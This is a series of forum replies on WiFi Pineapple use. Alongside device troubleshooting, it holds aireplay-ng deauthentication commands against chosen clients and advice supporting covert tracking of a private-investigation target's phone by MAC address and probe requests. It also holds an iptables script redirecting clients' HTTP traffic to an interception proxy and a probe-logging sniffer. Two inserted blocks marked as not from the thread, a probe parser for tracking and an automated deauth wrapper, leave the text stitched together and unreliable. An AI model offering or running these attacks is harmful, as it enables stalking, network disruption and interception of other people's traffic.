Posts posted by esa

  1. 7 hours ago, Anima said:

    Good day,

    After several months since buying my first Pineapple, back from a version lower than 1.0 if I recall, this week I was trying some tests with the module updates. After several hours my Pineapple started to work weird, so I did a reset to factory but the issue persists. Now in a Kali box the adapter tends to turn off after a click in the web interface.

    The modules I was testing were Occupineapple, Dwall and Evil Portal. I don't know if I just damaged the Pineapple or it was imminent because of the testing batch.

    Any advice or suggestion?

    Sorry for my English.

     

    If I get the issue right, in your case using the web interface (GUI) results in frequent shutdowns of the Nano?

    Some options:

    1) Verify that there is enough power for the Nano. Try different ways to power your device and see if that improves the stability.

    2) Reset to factory default ==> you have tried that but it didn't work out.

    3) Recover the firmware to the original, then perform the firmware upgrade.

    Another piece of advice: treat the OS as fragile. For each module that you install, ensure that the key features of the Nano still work before installing another module. Do use the shutdown button if possible.

     

  2. 1 hour ago, ortizimo said:

    No adapter found using ifconfig... no adapter found using airmon-ng. Using Kali.

    So you SSH'd into the WiFi Pineapple, ran ifconfig and did not find any adapter matching wlan1 or wlan1mon?

    Can you post a screenshot of the results of ifconfig, iwconfig and iwlist?

     

  3. 7 hours ago, ortizimo said:

    It's been a while and I've sent an email to Hak5 but haven't received a response. I've been busy and put it aside but tried it today and nothing. Now I don't get any shared connection and cannot log in to the Pineapple. What a waste of my money.

    Try to deauth for a longer duration. This will act as a DDoS and force the device to search for alternatives.
    My advice is to use the console mode to do it.

    The WiFi Pineapple's wlan0 is your default AP; you should use wlan1 to perform the deauth.

    After you SSH into the WiFi Pineapple:

    Run command (1) to check whether wlan1 or wlan1mon exists.
    If wlan1 exists, run (2), else run (3).
    Command (2) merely enables monitor mode for wlan1; it also renames it to wlan1mon.
    Command (3) merely dumps out whatever wlan1mon can receive over WiFi, so you should see some APs etc.
    Next run (4) to perform the deauth. You will need to configure the command according to which MAC you are going to deauth. Use aireplay-ng -h to list the help. Parameters -a and -c might be wrong, do verify.

    1) ifconfig
    2) airmon-ng start wlan1
    3) airodump-ng wlan1mon
    4) aireplay-ng -0 0 -a xxxxxx -c xxxxx wlan1mon

    https://www.aircrack-ng.org/doku.php?id=deauthentication

  4. Just now, gixxa said:

    Can't even delete modules now!

    Come on guys, step up to the mark; perhaps you should focus on getting the products you have already sold to customers in decent shape before turning your back on them to focus on bringing in more money with the next product.

    Alternatively, if you don't provide after-sales support, could you provide me with a product that's stable out of the box?

    I do face occasional issues when using the GUI and they can usually be solved by either a power reset or a factory reset. Sometimes the Recon scan will hang at 100%, other times PineAP will not work as intended.

    Generally, SSH into the device will offer a more reliable experience. Furthermore, with the console mode you are able to debug what exactly is wrong.

    Also, when you are facing too many issues it could be that the firmware wasn't updated properly, so a firmware recovery might come in handy.

     

    • Upvote 2
  5. 8 hours ago, haze1434 said:

    Thank you :)

    I'm attempting to put together a simple script to test feasibility.

    If one uses airodump-ng to start collecting data, is there a way to see which access points a mobile device has previously connected to?

    I can see under the 'Probes' header that there are some devices showing SSIDs and some are simply showing 'unassociated'. Are the SSIDs shown under here the access points that a device has previously connected to? Does this work even when they are out of range of the SSID?

    I'm thinking that, if the PI could work out which Access Point belongs to the target's home, then the script could monitor for any MACs that are probing for this SSID. Then, even if the MAC changes every few minutes, airodump-ng could still tell which mobile device is related to the target?

    It is not a complete solution, but it should work on a portion of your targets.

    Yes, SSID probe requests are based on previously connected SSIDs and they work even when the real AP is not nearby.

    You should get an iPhone and a cheap Android phone to experiment with.

    Do share your script if you have it.

  6. 10 minutes ago, haze1434 said:

    If a PI were to run airodump-ng to see whether someone was at home then, it would work if they were connected to their home Wi-Fi, but if they weren't, then the station MAC would change every few minutes?

    So, for example;

    1. Joe Bloggs is at home with his iOS device and connected to his Wi-Fi.
    2. PI Dave collects Joe's device MAC address using airodump-ng
    3. Joe Bloggs goes for a drive with his iOS device, with its Wi-Fi still turned on, but no longer in range of his home Wi-Fi, so it's not associated.
    4. PI Dave follows, with airodump-ng still collecting MACs

    In this scenario, would PI Dave's airodump still pick up Joe's iOS MAC, or would the MAC change within minutes and therefore not be recognised as the same device by airodump?

    The MAC address should change to a spoofed one as soon as it is disconnected from the real Wi-Fi network.

    On the timing of the change, it seems randomised; there is no fixed interval that I observed.

    More info.

    There are also some articles which suggest that iOS MAC randomization could be defeated. But the catch is that you need to know his real MAC to begin with.

    https://arxiv.org/pdf/1703.02874v1.pdf

  7. I am using a default Nano setup.

    1) Interference caused by the external environment at the time of the scan is beyond our control.

    http://packetworks.net/blog/common-causes-of-wifi-interference

    3) On iOS, the probe TX MAC changes very frequently, within minutes (no exact value). The only time it reveals its actual MAC is when it is connected to an AP.

    4) Once again I do not have the stats, but you should expect to see this behaviour on most modern phones. Try it on a Nexus or iPhone.

    Another thing I forgot to mention: I am also not certain whether phones TX at consistent power. Too many factors.

  8. Please experiment, maybe you have better luck than me.

    My conclusion is that relying on WiFi probes from client devices is not reliable and does not work for all cases.

    Some challenges would be:

    1) Interference in the signal resulting in fluctuating signal strength

    2) WiFi probe times differ between devices and OS; the target might be long gone before his/her device TXs again

    3) iOS MAC address randomisation, and some Android OS/phones

    4) Power saving mode which turns off WiFi TX when the screen is off

    5) We are assuming the WiFi module is turned on

  9. 15 minutes ago, haze1434 said:

    Hi all,

    I was recently talking with someone regarding Private Investigator work, and the discussion included ways in which one could tell which direction a tailed vehicle/person had turned when you get to a junction and are not certain whether they turned left or right etc.

    This has given me an idea regarding using the Station MAC of their mobile phone to determine which direction they went. Kind of like a poor man's GSM direction finder, but using the target's WiFi signal instead of the actual phone signal.

    I would like your thoughts on the following, whether you think this would be feasible, and possible best methods if it is.

    • Minimum 2 x directional WiFi antennas in the PI vehicle, one facing forwards and left, one facing forwards and right.
    • Beam widths set so that they are close to each other, but not actually crossing, at the front of the vehicle.
    • A device (RPi / laptop) with both antennas connected.
    • Both antennas in Monitor Mode, using airodump-ng to monitor nearby Station MACs.
    • A script created on the device to read which antenna is picking up a Station MAC with a higher signal strength than the other, and then output this to a screen / phone.

    Now, presuming the PI is able to get the mobile phone Station MAC of the person being investigated (not massively difficult) and the target has their phone WiFi on (happens often), in theory this method could make following them easier, as even without obvious sight of the vehicle/person ahead, the PI could have at least a rough idea of which direction they are in, in relation to their current position. It could perhaps also be possible to add more antennas, such as in each corner of the vehicle.

    Would this work? I'm tempted to have a play.

    Thanks.

    #!/usr/bin/env python3
    # probemon: log 802.11 probe requests and keep a live table of the latest
    # RSSI / time / channel seen per (station MAC, probed SSID).

    import os
    import sys
    import time
    import datetime
    import argparse
    import logging
    from collections import OrderedDict
    from logging.handlers import RotatingFileHandler

    from scapy.all import sniff, Dot11, Dot11Elt, Dot11ProbeReq, RadioTap

    try:
        import netaddr          # optional, only needed for --mac-info
    except ImportError:
        netaddr = None

    NAME = 'probemon'
    DESCRIPTION = "a command line tool for logging 802.11 probe request frames"

    args = None
    logger = logging.getLogger(NAME)
    # latest sighting per "mac<delimiter>ssid" key -> (rssi, time, channel)
    myDict = {}


    def get_elt(packet, eid):
        """Return the payload of the first information element with ID eid, or None."""
        elt = packet.getlayer(Dot11Elt)
        while elt is not None:
            if elt.ID == eid:
                return bytes(elt.info)
            elt = elt.payload.getlayer(Dot11Elt)
        return None


    def packet_callback(packet):
        # we are looking for management frames with the probe request subtype;
        # scapy exposes that as the Dot11ProbeReq layer
        if not packet.haslayer(Dot11) or not packet.haslayer(Dot11ProbeReq):
            return

        # transmitter address: the probing station itself
        fields = [packet.addr2]

        # parse the MAC and look up the organisation from the vendor octets
        if args.mac_info and netaddr is not None:
            try:
                fields.append(netaddr.EUI(packet.addr2).oui.registration().org)
            except netaddr.core.NotRegisteredError:
                fields.append('UNKNOWN')

        # SSID carried in the probe (empty for a broadcast probe)
        ssid = (get_elt(packet, 0) or b'').decode('utf-8', 'replace')
        if args.ssid:
            fields.append(ssid)
        textkey = args.delimiter.join([packet.addr2, ssid])

        # RSSI from the radiotap header instead of peeking at undecoded bytes
        rssi_val = None
        if packet.haslayer(RadioTap):
            rssi_val = packet[RadioTap].dBm_AntSignal
        if args.rssi:
            fields.append(str(rssi_val))

        # channel from the DS Parameter Set element (ID 3), if the station sent one
        ds = get_elt(packet, 3)
        channel = ds[0] if ds and len(ds) == 1 else None

        # preferred time format
        if args.time == 'unix':
            log_time = str(int(time.time()))
        else:
            log_time = datetime.datetime.now().isoformat()
        fields.append(log_time)

        logger.info(args.delimiter.join(fields))

        # live view: clear the terminal and redraw the table sorted by key
        os.system('tput reset')
        myDict[textkey] = (rssi_val, datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'), channel)
        for key, (rssi, seen, ch) in OrderedDict(sorted(myDict.items())).items():
            print(rssi, seen, ch, key)


    def main():
        global args
        parser = argparse.ArgumentParser(description=DESCRIPTION)
        parser.add_argument('-i', '--interface', help="capture interface (monitor mode)")
        parser.add_argument('-t', '--time', default='iso', choices=('unix', 'iso'), help="output time format")
        parser.add_argument('-o', '--output', default='probemon.log', help="logging output location")
        parser.add_argument('-b', '--max-bytes', type=int, default=5000000, help="maximum log size in bytes before rotating")
        parser.add_argument('-c', '--max-backups', type=int, default=99999, help="maximum number of log files to keep")
        parser.add_argument('-d', '--delimiter', default='\t', help="output field delimiter")
        parser.add_argument('-f', '--mac-info', action='store_true', help="include MAC address manufacturer")
        parser.add_argument('-s', '--ssid', action='store_true', help="include probe SSID in output")
        parser.add_argument('-r', '--rssi', action='store_true', help="include rssi in output")
        parser.add_argument('-D', '--debug', action='store_true', help="enable debug output")
        parser.add_argument('-l', '--log', action='store_true', help="enable scrolling live view of the logfile")
        args = parser.parse_args()

        if not args.interface:
            print("error: capture interface not given, try --help")
            sys.exit(-1)

        # setup our rotating logger
        logger.setLevel(logging.DEBUG if args.debug else logging.INFO)
        logger.addHandler(RotatingFileHandler(args.output, maxBytes=args.max_bytes, backupCount=args.max_backups))
        if args.log:
            logger.addHandler(logging.StreamHandler(sys.stdout))

        # channel hopping is not done here; drive the interface with airodump-ng
        # or a separate hopper while this script sniffs
        sniff(iface=args.interface, prn=packet_callback, store=0)


    if __name__ == '__main__':
        main()

    Might be useful.
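Added example for the probe-request discussion in the posts above (it is not code from this thread and not the probemon script): a dependency-free Python parser for raw probe requests as a monitor-mode interface delivers them (radiotap header + 802.11 management frame). It walks the radiotap present bitmap to pull the RSSI properly instead of reading trailing bytes, keeps only management frames of subtype 4, extracts the probed SSID and the DS Parameter Set channel from the information elements, and flags a locally-administered source MAC, which is what a randomised iOS/Android address looks like on the air. The two frames it builds are constructed for the example; the MACs and SSID are made up, not captured.

```python
"""Decode 802.11 probe requests (radiotap + management frame) by hand.

Added example, not code from the thread. The sample frames are constructed
in-line and are not real captures.
"""
import struct

# (size, alignment) of radiotap fields 0-13, from the radiotap field definitions.
RADIOTAP_FIELDS = {
    0: (8, 8), 1: (1, 1), 2: (1, 1), 3: (4, 2), 4: (2, 2), 5: (1, 1), 6: (1, 1),
    7: (2, 2), 8: (2, 2), 9: (2, 2), 10: (1, 1), 11: (1, 1), 12: (1, 1), 13: (1, 1),
}
RT_FLAGS_FCS = 0x10  # radiotap Flags bit: a 4-byte FCS trails the frame


def parse_radiotap(buf):
    """Return (rssi_dbm, freq_mhz, has_fcs, header_len) from a radiotap header."""
    version, _pad, length, present = struct.unpack_from("<BBHI", buf, 0)
    if version != 0 or length > len(buf):
        raise ValueError("bad radiotap header")
    offset, ext = 8, present
    while ext & (1 << 31):            # bit 31: another present word follows
        (ext,) = struct.unpack_from("<I", buf, offset)
        offset += 4
    rssi = freq = None
    flags = 0
    for bit in range(14):             # fields appear in bit order, each naturally aligned
        if not present & (1 << bit):
            continue
        size, align = RADIOTAP_FIELDS[bit]
        offset += (-offset) % align
        if bit == 1:
            flags = buf[offset]
        elif bit == 3:
            (freq,) = struct.unpack_from("<H", buf, offset)
        elif bit == 5:
            (rssi,) = struct.unpack_from("<b", buf, offset)   # signed dBm
        offset += size
    return rssi, freq, bool(flags & RT_FLAGS_FCS), length


def parse_probe_request(frame):
    """Return a dict describing a probe request, or None for any other frame."""
    rssi, freq, has_fcs, rt_len = parse_radiotap(frame)
    body = frame[rt_len:-4] if has_fcs else frame[rt_len:]
    if len(body) < 24:
        return None
    fc0 = body[0]
    if (fc0 >> 2) & 0x3 != 0 or fc0 >> 4 != 4:   # type 0 (mgmt), subtype 4 (probe req)
        return None
    addr2 = body[10:16]                           # transmitter: the probing station
    ssid, channel, pos = "", None, 24
    while pos + 2 <= len(body):                   # information elements: id, len, data
        eid, elen = body[pos], body[pos + 1]
        data = body[pos + 2:pos + 2 + elen]
        if len(data) < elen:
            break                                 # truncated element, stop
        if eid == 0:
            ssid = data.decode("utf-8", "replace")   # empty SSID = broadcast probe
        elif eid == 3 and elen == 1:
            channel = data[0]                        # DS Parameter Set
        pos += 2 + elen
    return {
        "mac": ":".join("%02x" % b for b in addr2),
        # Randomised iOS/Android addresses set the locally-administered bit (0x02
        # in the first octet); a clear bit means a burned-in, OUI-registered MAC.
        "randomised": bool(addr2[0] & 0x02),
        "ssid": ssid, "channel": channel, "rssi": rssi, "freq": freq,
    }


def build_probe_request(src_mac, ssid, channel, rssi, with_fcs=False):
    """Constructed test frame: radiotap (TSFT, Flags, Rate, Channel, AntSignal) + probe request."""
    present = (1 << 0) | (1 << 1) | (1 << 2) | (1 << 3) | (1 << 5)
    rt = struct.pack("<BBHI", 0, 0, 23, present)
    rt += struct.pack("<Q", 0)                                    # TSFT
    rt += struct.pack("<BB", RT_FLAGS_FCS if with_fcs else 0, 2)  # Flags, Rate
    rt += struct.pack("<HH", 2412 + 5 * (channel - 1), 0x00a0)    # Channel freq, flags
    rt += struct.pack("<b", rssi)                                 # dBm antenna signal
    hdr = b"\x40\x00\x00\x00" + b"\xff" * 6 + src_mac + b"\xff" * 6 + b"\x10\x00"
    ies = bytes([0, len(ssid)]) + ssid.encode()                   # SSID
    ies += bytes([1, 4, 0x82, 0x84, 0x8b, 0x96])                  # Supported Rates
    ies += bytes([3, 1, channel])                                 # DS Parameter Set
    return rt + hdr + ies + (b"\0\0\0\0" if with_fcs else b"")    # placeholder FCS


if __name__ == "__main__":
    # constructed sample MACs: first has the locally-administered bit set
    for f in (build_probe_request(bytes.fromhex("da1b2c3d4e5f"), "HomeNet", 6, -42),
              build_probe_request(bytes.fromhex("3c0754aabbcc"), "", 1, -70, True)):
        print(parse_probe_request(f))
```

Feed it the bytes of each frame from a pcap (or from scapy's `bytes(pkt)`) on the monitor interface; a probe with an empty SSID is a broadcast probe and tells you nothing about the station's past networks, while a probe from a non-randomised MAC is the only kind worth keying a tracker on, which is the limitation the posts above run into.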

  10. 2 hours ago, b0N3z said:

    I just put this on my Tetra and it won't allow for 5 GHz scan. I entered an issue on the git page.

    Hi, I just assumed the Tetra and Nano share the same module. As I do not have a Tetra, is it possible to upload the Tetra's default Recon module?

    I will do a code comparison and would likely be able to "fix" it if the changes are not too significant.

  11. 12 hours ago, GregBern said:

    I'm having some trouble with the Tetra. I am using the 15.05 firmware and am able to view and download modules from the web interface. The problem I am running into is that the dependencies will not install. I click the install button and they hang for a few minutes and go back to showing that the dependencies have not installed.  Modules I have tried include : Papers, SSLsplit, and Site Survey

    I can SSH into the Tetra and ping google so I know it has internet access. I tried running "opkg update" but it reaches out to  http://downloads.openwrt.org/chaos_calmer/15.05/ar71xx/generic/packages/base/Packages.gz. but hangs and does not update. Any help is much appreciated. 

    Try: wget http://downloads.openwrt.org/chaos_calmer/15.05/ar71xx/generic/packages/base/Packages.gz

    and report your observations.

  12. On 01/05/2017 at 8:12 AM, Sebkinne said:

    Hi @esa,

    I usually just use Sublime Text 3, but Atom is a pretty good free (and open source) alternative. They can both be setup to be very IDE like, but I have to admit they do not really get close to what Jetbrains has to offer.

    Having used PHPStorm in the past, I still do most of my Pineapple coding in Sublime as most of the features PHPStorm offers are not too relevant here or are available via plugins in both Sublime and Atom. It does take some time to setup and configure the way you want it, but it's definitely worth it.

    Thanks, will give Sublime Text a try after my JetBrains trial expires this weekend.

  13. On 25/02/2017 at 10:28 PM, anode said:

    Kinda minor, but on network page, an option to save AP names with a drop down.

    And option to hide management SSID.

    Was looking for the same function. Couldn't find it, so I just modded the Networking module instead. Surprisingly straightforward mod, < 5 lines of code.

    Copy the files and replace the files in the original Networking module. Do highlight if it works or if there are any bugs.

    https://github.com/esa101/NetworkingPlus


     

  14. 2 hours ago, b0N3z said:

    Tried it out; after four 1-min scans it never gave results. I have an Android phone that is not connected to any AP also.

    My bad, there is a missing folder in my git upload. Please create a folder called "log" in the module's directory. It should work after that.

    cd /pineapple/modules/ReconPlus
    mkdir log

    For others who intend to install on their SD card: transfer ReconPlus to /sd/modules/ReconPlus and remember to create the softlink.

    ln -s /sd/modules/ReconPlus /pineapple/modules/ReconPlus

     

  15. On 23/04/2017 at 4:12 AM, ev0lve said:

    Hi. Good that this forum exists. ;) People with experience on here.

    I am trying this in Windows for a start. There are always some issues with networking in Windows. ;) When I set up my Pineapple for the first time, I had a VPN on, and I do not know if that made the Pineapple boot up and set up the wrong details in it or not?

    If so, maybe I can try and do a factory reset.

    Right now I have the Pineapple set to 172.16.42.42

    and have sharing on my Ethernet settings.

    But I can't get any internet when I load bulletins in the Pineapple. Another thing I'm curious about: if I theoretically let someone else use my internet through the Pineapple and my internet, can I use OpenVPN with that, so that they browse with a VPN IP, but I can still intercept everything as normal? Does that work? If so, how?

    But first I need to get the internet working. Thanks a lot.

    Edit: Also, do I need to have both USB connections plugged in? If so, which I'm guessing, I can use Windows. Was gonna use Linux, but I use a USB stick, and I only have two USB ports on my laptop.

    1) I can easily power my Nano without both USB connections plugged in. I connect it straight to my laptop.

    2) It is a pain in the arse to get internet on Windows; somehow it always forgets my settings.

    a) Ensure that you have internet.

    b) Connect your Pineapple to your PC and wait till the blue LED is solid or the portal is up.

    c) On your main internet interface -> Properties -> Sharing, turn off internet sharing and wait 10 sec.

    d) On the same tab select your Pineapple interface and turn on internet sharing, wait 10 sec. Close the tab by clicking OK.

    e) On your Pineapple interface -> Properties -> Networking, select IPv4 and enter the IP address 172.16.42.42 / 255.255.255.0.

    f) Now your Pineapple should have internet. Else disable your Pineapple interface, enable it again and repeat steps (c) to (e).

  16. 4 minutes ago, mda1125 said:

    At home, I plug in a USB dongle and use that to easily connect to my home AP.  I can route any connected clients thru my Pineapple.  Works great.

    However, out and about, if I find Free WiFi that at least makes me input a password, it's golden!  But many places like SBUX are "free" but ask the user to initially accept and connect.

    That option doesn't seem to work via the WiFi Client Mode as there is no "password" to enter.

    I could tether the device and have but that option negates the use of the USB for a 3rd radio.

    I could use PortalAuth in combination with Evil Portal to at least attempt to capture I suspect.

    One solution: use your phone to connect to the SBUX WiFi, then "accept and connect" through the phone's browser. Now that the phone has internet, turn on USB tethering and connect your Pineapple to the phone over USB. Don't forget to download the WiFi Pineapple APK for easy access to your Pineapple's management console.

    **Don't think there is an easy solution to an offline captive portal. Good luck, HF.

     

  17. 16 hours ago, Rawpower said:

    Powering: okay (via wall 220V outlet and transformer, not over USB ... ;-(
    Factory reset: done, but no improvement.

    But I could further pinpoint the problem ...

    Only when I select 2.4 GHz recon (or both) does the recon process hang at 100% without results
    AND
    it happens only at my HOME location; I tested my Tetra Pineapple @ my parents' and the recon functions work normally ....

    So question ... what @ my HOME can spoil the recon function @ the 2.4 GHz band?

    Any suggestions?

    Many thanks for your input!

    Bart


    This is strange; it doesn't sound like faulty hardware since you can get it to work occasionally. Try this and report any errors faced:

    1) Restart your Pineapple

    2) SSH into it

    3) Start wlan1 in monitor mode using airmon-ng

    airmon-ng start wlan1

    4) Perform airodump using your wlan1mon interface. You should expect to see some MAC addresses in your vicinity

    airodump-ng wlan1mon

    5) This performs the same command as running Recon on 2.4 GHz for 1 min. The results will be stored in /tmp/re

    pinesniffer wlan1mon 60 1 /tmp/re

    6) Read /tmp/re; you should expect some results

    cat /tmp/re
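Added example, not from the thread: a small POSIX shell wrapper for the SSH-side steps in this post and in the deauth post further up (check for wlan1 / wlan1mon, start monitor mode if needed, then build and run the aireplay-ng deauth). It assumes what the thread states, that wlan1 is the Pineapple's sniffing/injection radio, and that iw, airmon-ng and aireplay-ng are on the box. The file name deauth.sh, the DRY_RUN variable and the sample `iw dev` text are made up for the example; the MAC validation is there because aireplay-ng will happily take a malformed -a/-c value and deauth nothing.

```shell
#!/bin/sh
# Added example, not from the thread: scripts the ssh-side steps above.
# Assumes wlan1 is the sniffing/injection radio (as the thread says) and that
# iw, airmon-ng and aireplay-ng are installed. DRY_RUN=1 prints the commands
# instead of executing them, so the logic can be exercised off-device.

# aireplay-ng wants colon-separated hex; reject anything else up front.
valid_mac() {
    printf '%s' "$1" | grep -Eiq '^([0-9a-f]{2}:){5}[0-9a-f]{2}$'
}

# Given `iw dev` output, print wlan1mon if monitor mode is already up,
# wlan1 if only the managed interface exists, nothing if neither is there.
pick_iface() {
    if printf '%s\n' "$1" | grep -q 'Interface wlan1mon'; then
        echo wlan1mon
    elif printf '%s\n' "$1" | grep -q 'Interface wlan1$'; then
        echo wlan1
    fi
    return 0
}

# Compose the deauth: -0 <count> (0 = until interrupted), -a <AP BSSID>,
# -c <client station MAC>. Swapping -a and -c is the usual mistake.
deauth_cmd() {
    iface="$1"; bssid="$2"; client="$3"; count="${4:-5}"
    valid_mac "$bssid"  || { echo "bad BSSID: $bssid" >&2; return 1; }
    valid_mac "$client" || { echo "bad client MAC: $client" >&2; return 1; }
    echo "aireplay-ng -0 $count -a $bssid -c $client $iface"
}

run() {
    if [ -n "$DRY_RUN" ]; then echo "+ $*"; else "$@"; fi
}

main() {
    iface=$(pick_iface "$(iw dev 2>/dev/null)")
    case "$iface" in
        "")    echo "wlan1 not found; check ifconfig / iw dev" >&2; return 1 ;;
        wlan1) run airmon-ng start wlan1; iface=wlan1mon ;;
    esac
    cmd=$(deauth_cmd "$iface" "$1" "$2" "${3:-10}") || return 1
    run $cmd
}

# Only act when given <AP BSSID> <client MAC> [count]; sourcing the file
# for its functions does nothing.
if [ $# -ge 2 ]; then
    main "$@"
fi
```

On the device: `DRY_RUN=1 sh deauth.sh <AP BSSID> <client MAC>` first to see what would run, then without DRY_RUN; pass a third argument of 0 for the long-running deauth the post above suggests when a short burst does not make the client roam.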

     

  18. On 21/04/2017 at 3:48 AM, M@s0n said:

    Hi everyone,

    I would like to use the WiFi Pineapple as a man-in-the-middle device redirecting all traffic to a laptop that the WiFi Pineapple is tethered to, similar to this setup: https://www.evilsocket.net/2016/09/15/WiFi-Pineapple-NANO-OS-X-and-BetterCap-setup/

    So here's my setup:

    MacBook running a Linux VM (VirtualBox) connected via USB to the WiFi Pineapple, which is sending all traffic to the VirtualBox machine.

    (Pardon my diagram skills :()

    Here is what I have created based off the post above; however, I don't think this is ideal. Any feedback would be appreciated.

     

    #!/bin/bash
    # Run as root on the Pineapple: redirect client HTTP to the proxy on the
    # tethered host (172.16.42.42:8080) and NAT the rest of the forwarded traffic.

    if [[ $# -eq 0 ]] ; then
        echo "Usage: $0 (enable|disable)"
        exit 1
    fi

    action="$1"
    case $action in
        enable)
          echo "Enabling ..."
          # client port 80 -> proxy on the host; 443 stays commented out
          iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 172.16.42.42:8080
          #iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination 172.16.42.42:8083
          # masquerade forwarded traffic so replies come back through the Pineapple
          iptables -t nat -A POSTROUTING -j MASQUERADE
        ;;
        disable)
          echo "Disabling ..."
          # remove exactly the rules added by enable, MASQUERADE included
          iptables -t nat -D PREROUTING -p tcp --dport 80 -j DNAT --to-destination 172.16.42.42:8080
          #iptables -t nat -D PREROUTING -p tcp --dport 443 -j DNAT --to-destination 172.16.42.42:8083
          iptables -t nat -D POSTROUTING -j MASQUERADE
        ;;
        *)
          echo "Usage: $0 (enable|disable)"
          exit 1
        ;;
    esac

     


    Can you elaborate on why this setup is not ideal? If it is not working, try using 192.168.1.2 as the destination IP.

  19. 24 minutes ago, sbb said:

    For the Nano, which antenna would be best to replace with a Yagi antenna? I understand that one is used for sending and the other for receiving, but I am not sure which one actually does what in order to replace it.

    Could anyone tell me which side of the Nano a single Yagi antenna would work best on?

    Depends on your needs.

    By default (using the GUI) wlan0 is responsible for the AP while wlan1 does sniffing and injection.

    If you want to create a free rogue AP, then connect it to wlan0. If you want to monitor/sniff, then connect it to wlan1.

    If you want to deauth a device and force it to connect to your AP, then you will need both.

     

    • Upvote 1